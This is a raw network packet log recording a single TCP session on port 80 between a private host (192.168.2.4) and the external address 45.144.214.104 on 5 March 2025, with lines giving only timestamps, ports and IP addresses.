Mar 5, 2025 10:52:07.969938040 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969948053 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.969958067 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.969964981 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.970910072 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.970943928 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.970968008 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.970999956 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971045017 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971060038 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.971091986 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971124887 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971146107 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.971178055 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971220016 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971235037 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.971268892 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971313953 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971329927 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.971661091 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971692085 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.971708059 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971718073 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971752882 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.971771955 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971779108 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971787930 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971797943 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971807003 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.971831083 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.971915960 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971925020 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971932888 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.971959114 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.972701073 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.972709894 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.972721100 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:07.972748041 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:07.972773075 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.099773884 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.099869967 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.099932909 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.099977016 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100019932 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100079060 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.100109100 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100162983 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100208998 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100224018 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.100256920 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100327015 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100343943 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.100383997 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100433111 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.100465059 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100498915 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100543976 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.100573063 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100606918 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100651026 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100670099 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.100703955 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100733042 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100754976 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.100790024 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100832939 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100847960 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.100878000 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100923061 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.100939035 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.100974083 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101016998 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.101051092 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101104975 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101140976 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101161003 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.101217031 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101263046 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101278067 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.101314068 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101358891 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101373911 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.101407051 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101449966 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101464987 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.101495981 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101541042 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101553917 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.101586103 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101633072 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101646900 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.101677895 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101721048 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101736069 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.101768017 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101810932 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101825953 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.101861000 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101914883 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.101932049 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.101968050 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102011919 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.102045059 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102094889 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102138042 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102159023 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.102195024 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102236986 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.102264881 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102298021 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102344036 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102359056 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.102391005 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102433920 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102447987 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.102487087 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102530003 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102544069 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.102575064 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102618933 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102632999 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.102664948 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.102705002 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.102721930 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103039026 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103095055 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.103143930 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103180885 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103224993 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.103256941 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103291988 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103334904 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103351116 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.103385925 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103419065 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103441954 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.103472948 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103516102 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103529930 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.103563070 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103609085 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103624105 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.103656054 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103698015 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103712082 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.103749990 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103799105 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.103934050 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.103992939 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.104038000 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.104067087 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.104099035 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.104144096 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.104160070 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.104191065 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.104240894 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.104254961 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.104289055 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.104331970 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.230247021 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230283976 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230345964 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.230365038 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230397940 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230446100 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.230469942 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230504990 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230551958 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230566978 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.230623007 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230665922 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.230685949 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230736971 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230779886 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230793953 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.230825901 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230870962 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.230890036 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230942965 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230976105 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.230997086 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.231030941 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231077909 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231092930 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.231147051 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231192112 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.231219053 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231270075 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231316090 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231329918 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.231367111 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231410980 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231425047 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.231457949 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231494904 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231518030 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.231554031 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231600046 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231614113 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.231667995 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231712103 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231725931 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.231781960 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231829882 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.231858969 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231898069 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231942892 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.231957912 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.231992006 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232024908 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232048988 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232081890 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232126951 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232141972 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232172966 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232215881 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232228994 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232260942 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232300997 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232317924 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232351065 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232378006 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232387066 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232400894 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232409954 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232419968 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232429028 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232438087 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232455015 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232460976 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232469082 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232479095 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232489109 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232496023 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232507944 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232515097 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232523918 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232542992 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232549906 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232559919 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232583046 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232588053 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232597113 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232605934 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232620001 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232624054 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232635021 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232641935 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232649088 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232660055 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232667923 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232682943 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232692003 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232696056 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232702971 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232707977 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232717991 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232727051 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232734919 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232743979 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232754946 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232762098 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232770920 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232779980 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232789993 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.232799053 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.232806921 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.233308077 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233316898 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233325005 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233357906 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.233386993 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.233448029 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233498096 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233532906 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233557940 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.233591080 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233639002 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.233669996 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233721018 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233763933 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233778000 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.233809948 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233856916 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233871937 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.233880997 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233891964 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233902931 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233910084 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.233918905 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233930111 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233937979 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.233947039 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233961105 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233966112 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.233975887 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233988047 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.233995914 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234021902 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234271049 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234281063 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234292984 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234311104 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234319925 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234328032 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234338999 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234348059 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234358072 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234366894 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234395981 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234406948 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234416962 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234426975 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234448910 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234456062 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234464884 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234493971 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234580040 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234589100 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234611034 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234623909 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234631062 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234642029 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234652996 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234662056 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234673023 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234679937 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.234687090 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234698057 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.234714985 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.235254049 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.235265017 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.235276937 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.235285044 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.235317945 CET	49730	80	192.168.2.4	45.144.214.104
Mar 5, 2025 10:52:08.322268009 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.322319031 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.322360992 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.322396040 CET	80	49730	45.144.214.104	192.168.2.4
Mar 5, 2025 10:52:08.322429895 CET	80	49730	45.144.214.104	192.168.2.4
